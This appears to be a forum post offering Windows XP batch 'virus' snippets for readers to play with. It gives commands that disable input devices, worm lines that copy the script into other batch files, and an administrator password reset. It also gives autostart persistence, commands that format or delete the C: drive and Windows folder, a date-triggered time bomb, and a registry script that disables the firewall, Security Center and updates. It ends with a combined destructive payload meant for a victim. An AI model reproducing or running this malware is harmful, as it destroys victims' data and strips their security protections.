****************( only for win xp )****************
@echo off
cls
Here are just a few "virus" codes i’ve compiled. Don’t be afraid to play around with them. (All codes are without quotes)
"rundll32 user,swapmousebutton"
Swaps mouse buttons
"start www.google.com"
Opens the URL you want
"shutdown -s -t 10 -c "YOUR MESSAGE HERE" -f"
Shuts down computer and shows message you want
"rundll32 mouse,disable"
Pretty self-explanatory. Disables mouse till next restart.
"rundll32 keyboard,disable"
Disables keyboard till next restart.
"rundll32 user,disableoemlayer"
Freezes computer till restart.
Worm commands:
"ctty nul
for %%i in (*.bat) do copy %0+%%i %%i /y >nul"
That command (two lines) will copy itself to any batch file in the directory.
"%0 >>other.bat"
Clears other batch file’s source and copies itself to it.
Trojan Codes:
"dir *.*>>Filelist.txt"
Sends list of files in same directory into a text document, and places it into a text document in the same directory.
"net user administrator PASSWORD HERE"
Changes specific user account’s password to whatever you want! I like administrator!
"ipconfig >Computer-IP-address.txt"
Creates a text file with ip address information in same directory as batch file.
These are a bit harsh:
"COPY %0 %windir%WINSTART.BAT"
Copies itself to the AutoRun section of windows... will not go away!
"format c: /q /autotest"
Pretty obvious...formats c drive without asking.
"DELTREE /Y %windir%"
Deletes windows
"DEL /F /S /Q C:"
Deletes C: Drive, /F means forced, /S deletes whole tree, /Q makes it quiet so it does not ask yes or no.
"@echo off
echo. | date | find /c /i "2005.05.10" > NUL
If errorlevel 1 GoTo End
YOUR CODE HERE LIKE DELETE C DRIVE OR WHATEVER
:End"
"Time-bombs" computer... just remember to change the date!
"net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0"
Turns off firewall and stops security center
Pause Commands:
"@ping.exe 127.0.0.1 -n 20 -w 1000 > nul"
Pauses for 20 seconds (you can change time)
"pause"
pauses till they press another key
I made a code, it’s pretty bad-ass. I would not give this to someone that you wish to continue being friends with
Quote:
@echo off
cls
rundll32 mouse,disable
rundll32 keyboard,disable
COPY %0 %windir%WINSTART.BAT
net stop "Security Center"
net stop SharedAccess
echo You got owned!!!
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
start www.yourname.com/
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
DEL /F /S /Q C:
shutdown -s -t 10 -c "Say bye to your computer!" -f






Last edited:



